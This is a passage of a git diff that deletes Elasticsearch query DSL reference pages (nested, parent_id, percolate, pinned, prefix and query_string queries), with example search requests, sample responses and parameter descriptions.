- -`constant_score_boolean`:: -Assigns each document a relevance score equal to the `boost` -parameter. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -This method can cause the final `bool` query to exceed the clause limit in the -<> -setting. If the query exceeds this limit, {es} returns an error. - -`scoring_boolean`:: -Calculates a relevance score for each matching document. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -This method can cause the final `bool` query to exceed the clause limit in the -<> -setting. If the query exceeds this limit, {es} returns an error. - -`top_terms_blended_freqs_N`:: -Calculates a relevance score for each matching document as if all terms had the -same frequency. This frequency is the maximum frequency of all matching terms. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query only includes `term` queries for the top `N` scoring -terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -`top_terms_boost_N`:: -Assigns each matching document a relevance score equal to the `boost` parameter. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query only includes `term` queries for the top `N` terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -`top_terms_N`:: -Calculates a relevance score for each matching document. -+ -This method changes the original query to a <>. This `bool` query contains a `should` clause and -<> for each matching term. -+ -The final `bool` query -only includes `term` queries for the top `N` scoring terms. -+ -You can use this method to avoid exceeding the clause limit in the -<> -setting. - -[discrete] -[[rewrite-param-perf-considerations]] -=== Performance considerations for the `rewrite` parameter -For most uses, we recommend using the `constant_score`, -`constant_score_boolean`, or `top_terms_boost_N` rewrite methods. - -Other methods calculate relevance scores. These score calculations are often -expensive and do not improve query results. \ No newline at end of file diff --git a/docs/reference/query-dsl/nested-query.asciidoc b/docs/reference/query-dsl/nested-query.asciidoc deleted file mode 100644 index 853e1012bcf..00000000000 --- a/docs/reference/query-dsl/nested-query.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[[query-dsl-nested-query]] -=== Nested query -++++ -Nested -++++ - -Wraps another query to search <> fields. - -The `nested` query searches nested field objects as if they were indexed as -separate documents. If an object matches the search, the `nested` query returns -the root parent document. - -[[nested-query-ex-request]] -==== Example request - -[[nested-query-index-setup]] -===== Index setup - -To use the `nested` query, your index must include a <> field -mapping. 
For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "obj1": { - "type": "nested" - } - } - } -} - ----- - -[[nested-query-ex-query]] -===== Example query - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "nested": { - "path": "obj1", - "query": { - "bool": { - "must": [ - { "match": { "obj1.name": "blue" } }, - { "range": { "obj1.count": { "gt": 5 } } } - ] - } - }, - "score_mode": "avg" - } - } -} ----- -// TEST[continued] - -[[nested-top-level-params]] -==== Top-level parameters for `nested` - -`path`:: -(Required, string) Path to the nested object you wish to search. - -`query`:: -+ --- -(Required, query object) Query you wish to run on nested objects in the `path`. -If an object matches the search, the `nested` query returns the root parent -document. - -You can search nested fields using dot notation that includes the complete path, -such as `obj1.name`. - -Multi-level nesting is automatically supported, and detected, resulting in an -inner nested query to automatically match the relevant nesting level, rather -than root, if it exists within another nested query. - -See <> for an example. --- - -`score_mode`:: -+ --- -(Optional, string) Indicates how scores for matching child objects affect the -root parent document's <>. Valid values -are: - -`avg` (Default):: -Use the mean relevance score of all matching child objects. - -`max`:: -Uses the highest relevance score of all matching child objects. - -`min`:: -Uses the lowest relevance score of all matching child objects. - -`none`:: -Do not use the relevance scores of matching child objects. The query assigns -parent documents a score of `0`. - -`sum`:: -Add together the relevance scores of all matching child objects. --- - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `path` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `path` is an unmapped field. - -You can use this parameter to query multiple indices that may not contain the -field `path`. --- - -[[nested-query-notes]] -==== Notes - -[[multi-level-nested-query-ex]] -===== Multi-level nested queries - -To see how multi-level nested queries work, -first you need an index that has nested fields. -The following request defines mappings for the `drivers` index -with nested `make` and `model` fields. - -[source,console] ----- -PUT /drivers -{ - "mappings": { - "properties": { - "driver": { - "type": "nested", - "properties": { - "last_name": { - "type": "text" - }, - "vehicle": { - "type": "nested", - "properties": { - "make": { - "type": "text" - }, - "model": { - "type": "text" - } - } - } - } - } - } - } -} ----- - -Next, index some documents to the `drivers` index. - -[source,console] ----- -PUT /drivers/_doc/1 -{ - "driver" : { - "last_name" : "McQueen", - "vehicle" : [ - { - "make" : "Powell Motors", - "model" : "Canyonero" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } -} - -PUT /drivers/_doc/2?refresh -{ - "driver" : { - "last_name" : "Hudson", - "vehicle" : [ - { - "make" : "Mifune", - "model" : "Mach Five" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } -} ----- -// TEST[continued] - -You can now use a multi-level nested query -to match documents based on the `make` and `model` fields. 
- -[source,console] ----- -GET /drivers/_search -{ - "query": { - "nested": { - "path": "driver", - "query": { - "nested": { - "path": "driver.vehicle", - "query": { - "bool": { - "must": [ - { "match": { "driver.vehicle.make": "Powell Motors" } }, - { "match": { "driver.vehicle.model": "Canyonero" } } - ] - } - } - } - } - } - } -} ----- -// TEST[continued] - -The search request returns the following response: - -[source,console-result] ----- -{ - "took" : 5, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 3.7349272, - "hits" : [ - { - "_index" : "drivers", - "_type" : "_doc", - "_id" : "1", - "_score" : 3.7349272, - "_source" : { - "driver" : { - "last_name" : "McQueen", - "vehicle" : [ - { - "make" : "Powell Motors", - "model" : "Canyonero" - }, - { - "make" : "Miller-Meteor", - "model" : "Ecto-1" - } - ] - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 5/"took": $body.took/] diff --git a/docs/reference/query-dsl/parent-id-query.asciidoc b/docs/reference/query-dsl/parent-id-query.asciidoc deleted file mode 100644 index 8b573c08dcc..00000000000 --- a/docs/reference/query-dsl/parent-id-query.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[[query-dsl-parent-id-query]] -=== Parent ID query -++++ -Parent ID -++++ - -Returns child documents <> to a specific parent document. -You can use a <> field mapping to create parent-child -relationships between documents in the same index. - -[[parent-id-query-ex-request]] -==== Example request - -[[parent-id-index-setup]] -===== Index setup -To use the `parent_id` query, your index must include a <> -field mapping. To see how you can set up an index for the `parent_id` query, try -the following example. - -. Create an index with a <> field mapping. -+ --- -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "my-parent": "my-child" - } - } - } - } -} - ----- -// TESTSETUP --- - -. Index a parent document with an ID of `1`. -+ --- -[source,console] ----- -PUT /my-index-000001/_doc/1?refresh -{ - "text": "This is a parent document.", - "my-join-field": "my-parent" -} ----- --- - -. Index a child document of the parent document. -+ --- -[source,console] ----- -PUT /my-index-000001/_doc/2?routing=1&refresh -{ - "text": "This is a child document.", - "my-join-field": { - "name": "my-child", - "parent": "1" - } -} ----- --- - -[[parent-id-query-ex-query]] -===== Example query - -The following search returns child documents for a parent document with an ID of -`1`. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "parent_id": { - "type": "my-child", - "id": "1" - } - } -} ----- - -[[parent-id-top-level-params]] -==== Top-level parameters for `parent_id` - -`type`:: -(Required, string) Name of the child relationship mapped for the -<> field. - -`id`:: -(Required, string) ID of the parent document. The query will return child -documents of this parent document. - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`type`.
--- diff --git a/docs/reference/query-dsl/percolate-query.asciidoc b/docs/reference/query-dsl/percolate-query.asciidoc deleted file mode 100644 index 64c0b904dad..00000000000 --- a/docs/reference/query-dsl/percolate-query.asciidoc +++ /dev/null @@ -1,701 +0,0 @@ -[[query-dsl-percolate-query]] -=== Percolate query -++++ -Percolate -++++ - -The `percolate` query can be used to match queries -stored in an index. The `percolate` query itself -contains the document that will be used as query -to match with the stored queries. - -[discrete] -=== Sample Usage - -Create an index with two fields: - -[source,console] --------------------------------------------------- -PUT /my-index-00001 -{ - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "query": { - "type": "percolator" - } - } - } -} --------------------------------------------------- - -The `message` field is the field used to preprocess the document defined in -the `percolator` query before it gets indexed into a temporary index. - -The `query` field is used for indexing the query documents. It will hold a -json object that represents an actual Elasticsearch query. The `query` field -has been configured to use the <>. This field -type understands the query dsl and stores the query in such a way that it can be -used later on to match documents defined on the `percolate` query. - -Register a query in the percolator: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/1?refresh -{ - "query": { - "match": { - "message": "bonsai tree" - } - } -} --------------------------------------------------- -// TEST[continued] - -Match a document to the registered percolator queries: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "message": "A new bonsai tree in the office" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The above request will yield the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { <1> - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0] <2> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The query with id `1` matches our document. -<2> The `_percolator_document_slot` field indicates which document has matched with this query. - Useful when percolating multiple document simultaneously. - -TIP: To provide a simple example, this documentation uses one index `my-index-00001` for both the percolate queries and documents. -This set-up can work well when there are just a few percolate queries registered. However, with heavier usage it is recommended -to store queries and documents in separate indices. Please see <> for more details. - -[discrete] -==== Parameters - -The following parameters are required when percolating a document: - -[horizontal] -`field`:: The field of type `percolator` that holds the indexed queries. This is a required parameter. 
-`name`:: The suffix to be used for the `_percolator_document_slot` field in case multiple `percolate` queries have been specified. - This is an optional parameter. -`document`:: The source of the document being percolated. -`documents`:: Like the `document` parameter, but accepts multiple documents via a json array. -`document_type`:: The type / mapping of the document being percolated. This parameter is deprecated and will be removed in Elasticsearch 8.0. - -Instead of specifying the source of the document being percolated, the source can also be retrieved from an already -stored document. The `percolate` query will then internally execute a get request to fetch that document. - -In that case the `document` parameter can be substituted with the following parameters: - -[horizontal] -`index`:: The index the document resides in. This is a required parameter. -`type`:: The type of the document to fetch. This parameter is deprecated and will be removed in Elasticsearch 8.0. -`id`:: The id of the document to fetch. This is a required parameter. -`routing`:: Optionally, routing to be used to fetch document to percolate. -`preference`:: Optionally, preference to be used to fetch document to percolate. -`version`:: Optionally, the expected version of the document to be fetched. - -[discrete] -==== Percolating in a filter context - -In case you are not interested in the score, better performance can be expected by wrapping -the percolator query in a `bool` query's filter clause or in a `constant_score` query: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "constant_score": { - "filter": { - "percolate": { - "field": "query", - "document": { - "message": "A new bonsai tree in the office" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -At index time terms are extracted from the percolator query and the percolator -can often determine whether a query matches just by looking at those extracted -terms. However, computing scores requires to deserialize each matching query -and run it against the percolated document, which is a much more expensive -operation. Hence if computing scores is not required the `percolate` query -should be wrapped in a `constant_score` query or a `bool` query's filter clause. - -Note that the `percolate` query never gets cached by the query cache. - -[discrete] -==== Percolating multiple documents - -The `percolate` query can match multiple documents simultaneously with the indexed percolator queries. -Percolating multiple documents in a single request can improve performance as queries only need to be parsed and -matched once instead of multiple times. - -The `_percolator_document_slot` field that is being returned with each matched percolator query is important when percolating -multiple documents simultaneously. It indicates which documents matched with a particular percolator query. The numbers -correlate with the slot in the `documents` array specified in the `percolate` query. 
- -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "documents": [ <1> - { - "message": "bonsai tree" - }, - { - "message": "new tree" - }, - { - "message": "the office" - }, - { - "message": "office tree" - } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The documents array contains 4 documents that are going to be percolated at the same time. - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.7093853, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.7093853, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0, 1, 3] <1> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The `_percolator_document_slot` indicates that the first, second and last documents specified in the `percolate` query - are matching with this query. - -[discrete] -==== Percolating an Existing Document - -In order to percolate a newly indexed document, the `percolate` query can be used. Based on the response -from an index request, the `_id` and other meta information can be used to immediately percolate the newly added -document. - -[discrete] -===== Example - -Based on the previous example. - -Index the document we want to percolate: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/2 -{ - "message" : "A new bonsai tree in the office" -} --------------------------------------------------- -// TEST[continued] -Index response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-00001", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "result": "created", - "_seq_no" : 1, - "_primary_term" : 1 -} --------------------------------------------------- - -Percolating an existing document, using the index response as basis to build to new search request: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "index": "my-index-00001", - "id": "2", - "version": 1 <1> - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The version is optional, but useful in certain cases. We can ensure that we are trying to percolate -the document we just have indexed. A change may be made after we have indexed, and if that is the -case the search request would fail with a version conflict error. - -The search response returned is identical as in the previous example. - -[discrete] -==== Percolate query and highlighting - -The `percolate` query is handled in a special way when it comes to highlighting. The queries hits are used -to highlight the document that is provided in the `percolate` query. Whereas with regular highlighting the query in -the search request is used to highlight the hits. - -[discrete] -===== Example - -This example is based on the mapping of the first example. 
- -Save a query: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/3?refresh -{ - "query": { - "match": { - "message": "brown fox" - } - } -} --------------------------------------------------- -// TEST[continued] - -Save another query: - -[source,console] --------------------------------------------------- -PUT /my-index-00001/_doc/4?refresh -{ - "query": { - "match": { - "message": "lazy dog" - } - } -} --------------------------------------------------- -// TEST[continued] - -Execute a search request with the `percolate` query and highlighting enabled: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "document": { - "message": "The quick brown fox jumps over the lazy dog" - } - } - }, - "highlight": { - "fields": { - "message": {} - } - } -} --------------------------------------------------- -// TEST[continued] - -This will yield the following response. - -[source,console-result] --------------------------------------------------- -{ - "took": 7, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "3", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "brown fox" - } - } - }, - "highlight": { - "message": [ - "The quick brown fox jumps over the lazy dog" <1> - ] - }, - "fields" : { - "_percolator_document_slot" : [0] - } - }, - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "4", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "lazy dog" - } - } - }, - "highlight": { - "message": [ - "The quick brown fox jumps over the lazy dog" <1> - ] - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 7,/"took": "$body.took",/] - -<1> The terms from each query have been highlighted in the document. - -Instead of the query in the search request highlighting the percolator hits, the percolator queries are highlighting -the document defined in the `percolate` query. 
- -When percolating multiple documents at the same time like the request below then the highlight response is different: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "documents": [ - { - "message": "bonsai tree" - }, - { - "message": "new tree" - }, - { - "message": "the office" - }, - { - "message": "office tree" - } - ] - } - }, - "highlight": { - "fields": { - "message": {} - } - } -} --------------------------------------------------- -// TEST[continued] - -The slightly different response: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.7093853, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.7093853, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0, 1, 3] - }, - "highlight" : { <1> - "0_message" : [ - "bonsai tree" - ], - "3_message" : [ - "office tree" - ], - "1_message" : [ - "new tree" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The highlight fields have been prefixed with the document slot they belong to, - in order to know which highlight field belongs to what document. - -[discrete] -==== Specifying multiple percolate queries - -It is possible to specify multiple `percolate` queries in a single search request: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "bool": { - "should": [ - { - "percolate": { - "field": "query", - "document": { - "message": "bonsai tree" - }, - "name": "query1" <1> - } - }, - { - "percolate": { - "field": "query", - "document": { - "message": "tulip flower" - }, - "name": "query2" <1> - } - } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `name` parameter will be used to identify which percolator document slots belong to what `percolate` query. - -The `_percolator_document_slot` field name will be suffixed with what is specified in the `_name` parameter. -If that isn't specified then the `field` parameter will be used, which in this case will result in ambiguity. - -The above search request returns a response similar to this: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot_query1" : [0] <1> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The `_percolator_document_slot_query1` percolator slot field indicates that these matched slots are from the `percolate` - query with `_name` parameter set to `query1`. 
- -[discrete] -[[how-it-works]] -==== How it Works Under the Hood - -When indexing a document into an index that has the <> mapping configured, the query -part of the document gets parsed into a Lucene query and is stored into the Lucene index. A binary representation -of the query gets stored, but also the query's terms are analyzed and stored into an indexed field. - -At search time, the document specified in the request gets parsed into a Lucene document and is stored in an in-memory -temporary Lucene index. This in-memory index can hold just this one document and is optimized for that. After this, -a special query is built based on the terms in the in-memory index that selects candidate percolator queries based on -their indexed query terms. These candidate queries are then evaluated against the in-memory index to check whether they actually match. - -The selection of candidate percolator query matches is an important performance optimization during the execution -of the `percolate` query as it can significantly reduce the number of candidate matches the in-memory index needs to -evaluate. The reason the `percolate` query can do this is that during indexing of the percolator queries the query -terms are extracted and indexed with the percolator query. Unfortunately the percolator cannot extract terms from -all queries (for example the `wildcard` or `geo_shape` query), and as a result in certain cases the percolator -can't do the selection optimization (for example if an unsupported query is defined in a required clause of a boolean query -or the unsupported query is the only query in the percolator document). These queries are marked by the percolator and -can be found by running the following search: - - -[source,console] ---------------------------------------------------- -GET /_search -{ - "query": { - "term" : { - "query.extraction_result" : "failed" - } - } -} ---------------------------------------------------- - -NOTE: The above example assumes that there is a `query` field of type -`percolator` in the mappings. - -Given the design of percolation, it often makes sense to use separate indices for the percolate queries and documents -being percolated, as opposed to a single index as we do in these examples. There are a few benefits to this approach: - -- Because percolate queries contain a different set of fields from the percolated documents, using two separate indices -allows for fields to be stored in a denser, more efficient way. -- Percolate queries do not scale in the same way as other queries, so percolation performance may benefit from using -a different index configuration, like the number of primary shards. - -[[percolate-query-notes]] -==== Notes -===== Allow expensive queries -Percolate queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/pinned-query.asciidoc b/docs/reference/query-dsl/pinned-query.asciidoc deleted file mode 100644 index c55df9ff86f..00000000000 --- a/docs/reference/query-dsl/pinned-query.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[query-dsl-pinned-query]] -=== Pinned Query -Promotes selected documents to rank higher than those matching a given query. -This feature is typically used to guide searchers to curated documents that are -promoted over and above any "organic" matches for a search. -The promoted or "pinned" documents are identified using the document IDs stored in -the <> field.
- -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "pinned": { - "ids": [ "1", "4", "100" ], - "organic": { - "match": { - "description": "iphone" - } - } - } - } -} --------------------------------------------------- - -[[pinned-query-top-level-parameters]] -==== Top-level parameters for `pinned` - -`ids`:: -An array of <> listed in the order they are to appear in results. -`organic`:: -Any choice of query used to rank documents which will be ranked below the "pinned" document ids. diff --git a/docs/reference/query-dsl/prefix-query.asciidoc b/docs/reference/query-dsl/prefix-query.asciidoc deleted file mode 100644 index b400924edb1..00000000000 --- a/docs/reference/query-dsl/prefix-query.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[query-dsl-prefix-query]] -=== Prefix query -++++ -Prefix -++++ - -Returns documents that contain a specific prefix in a provided field. - -[[prefix-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains a term -that begins with `ki`. - -[source,console] ----- -GET /_search -{ - "query": { - "prefix": { - "user.id": { - "value": "ki" - } - } - } -} ----- - -[[prefix-query-top-level-params]] -==== Top-level parameters for `prefix` -``:: -(Required, object) Field you wish to search. - -[[prefix-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Beginning characters of terms you wish to find in the -provided ``. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -`case_insensitive`:: -(Optional, Boolean) allows ASCII case insensitive matching of the -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -[[prefix-query-notes]] -==== Notes - -[[prefix-query-short-ex]] -===== Short request example -You can simplify the `prefix` query syntax by combining the `` and -`value` parameters. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "prefix" : { "user" : "ki" } - } -} ----- - -[[prefix-query-index-prefixes]] -===== Speed up prefix queries -You can speed up prefix queries using the <> -mapping parameter. If enabled, {es} indexes prefixes between 2 and 5 -characters in a separate field. This lets {es} run prefix queries more -efficiently at the cost of a larger index. - -[[prefix-query-allow-expensive-queries]] -===== Allow expensive queries -Prefix queries will not be executed if <> -is set to false. However, if <> are enabled, an optimised query is built which -is not considered slow, and will be executed in spite of this setting. diff --git a/docs/reference/query-dsl/query-string-query.asciidoc b/docs/reference/query-dsl/query-string-query.asciidoc deleted file mode 100644 index a36289722a7..00000000000 --- a/docs/reference/query-dsl/query-string-query.asciidoc +++ /dev/null @@ -1,554 +0,0 @@ -[[query-dsl-query-string-query]] -=== Query string query -++++ -Query string -++++ - -Returns documents based on a provided query string, using a parser with a strict -syntax. - -This query uses a <> to parse and split the provided -query string based on operators, such as `AND` or `NOT`. The query -then <> each split text independently before returning -matching documents. - -You can use the `query_string` query to create a complex search that includes -wildcard characters, searches across multiple fields, and more. 
While versatile, -the query is strict and returns an error if the query string includes any -invalid syntax. - -[WARNING] -==== -Because it returns an error for any invalid syntax, we don't recommend using -the `query_string` query for search boxes. - -If you don't need to support a query syntax, consider using the -<> query. If you need the features of a query -syntax, use the <> -query, which is less strict. -==== - - -[[query-string-query-ex-request]] -==== Example request - -When running the following search, the `query_string` query splits `(new york -city) OR (big apple)` into two parts: `new york city` and `big apple`. The -`content` field's analyzer then independently converts each part into tokens -before returning matching documents. Because the query syntax does not use -whitespace as an operator, `new york city` is passed as-is to the analyzer. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "(new york city) OR (big apple)", - "default_field": "content" - } - } -} --------------------------------------------------- - -[[query-string-top-level-params]] -==== Top-level parameters for `query_string` -`query`:: -(Required, string) Query string you wish to parse and use for search. See -<>. - -`default_field`:: -+ --- -(Optional, string) Default field you wish to search if no field is provided in -the query string. - -Defaults to the `index.query.default_field` index setting, which has a default -value of `*`. The `*` value extracts all fields that are eligible for term -queries and filters the metadata fields. All extracted fields are then -combined to build a query if no `prefix` is specified. - -Searching across all eligible fields does not include <>. Use a <> to search those -documents. - -[[WARNING]] -==== -For mappings with a large number of fields, searching across all eligible fields -could be expensive. - -There is a limit on the number of fields that can be queried at once. -It is defined by the `indices.query.bool.max_clause_count` -<>, which defaults to 1024. -==== --- - -`allow_leading_wildcard`:: -(Optional, Boolean) If `true`, the wildcard characters `*` and `?` are allowed -as the first character of the query string. Defaults to `true`. - -`analyze_wildcard`:: -(Optional, Boolean) If `true`, the query attempts to analyze wildcard terms in -the query string. Defaults to `false`. - -`analyzer`:: -(Optional, string) <> used to convert text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. If no analyzer is mapped, the index's default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. -See <> for an example. - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of the query. Defaults to `1.0`. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -`default_operator`:: -+ --- -(Optional, string) Default boolean logic used to interpret text in the query -string if no operators are specified. Valid values are: - - `OR` (Default):: -For example, a query string of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - - `AND`:: -For example, a query string of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. 
--- - -`enable_position_increments`:: -(Optional, Boolean) If `true`, enable position increments in queries constructed -from a `query_string` search. Defaults to `true`. - -`fields`:: -+ --- -(Optional, array of strings) Array of fields you wish to search. - -You can use this parameter query to search across multiple fields. See -<>. --- - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. - -`fuzzy_max_expansions`:: -(Optional, integer) Maximum number of terms to which the query expands for fuzzy -matching. Defaults to `50`. - -`fuzzy_prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. - -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -value for a <> field, are ignored. Defaults to `false`. - -`max_determinized_states`:: -+ --- -(Optional, integer) Maximum number of -{wikipedia}/Deterministic_finite_automaton[automaton states] -required for the query. Default is `10000`. - -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to parse -regular expressions. Lucene converts each regular expression to a finite -automaton containing a number of determinized states. - -You can use this parameter to prevent that conversion from unintentionally -consuming too many resources. You may need to increase this limit to run complex -regular expressions. --- - -`minimum_should_match`:: -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. See -<> for an example. - -`quote_analyzer`:: -+ --- -(Optional, string) <> used to convert quoted text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. - -For quoted text, this parameter overrides the analyzer specified in the -`analyzer` parameter. --- - -`phrase_slop`:: -(Optional, integer) Maximum number of positions allowed between matching tokens -for phrases. Defaults to `0`. If `0`, exact phrase matches are required. -Transposed terms have a slop of `2`. - -`quote_field_suffix`:: -+ --- -(Optional, string) Suffix appended to quoted text in the query string. - -You can use this suffix to use a different analysis method for exact matches. -See <>. --- - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -`time_zone`:: -+ --- -(Optional, string) -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC) offset] or -{wikipedia}/List_of_tz_database_time_zones[IANA time zone] -used to convert `date` values in the query string to UTC. - -Valid values are ISO 8601 UTC offsets, such as `+01:00` or -`08:00`, and IANA -time zone IDs, such as `America/Los_Angeles`. - -[NOTE] -==== -The `time_zone` parameter does **not** affect the <> value -of `now`. `now` is always the current system time in UTC. However, the -`time_zone` parameter does convert dates calculated using `now` and -<>. For example, the `time_zone` parameter will -convert a value of `now/d`. -==== --- - -[[query-string-query-notes]] -==== Notes - -include::query-string-syntax.asciidoc[] - -[[query-string-nested]] -====== Avoid using the `query_string` query for nested documents - -`query_string` searches do not return <> documents. 
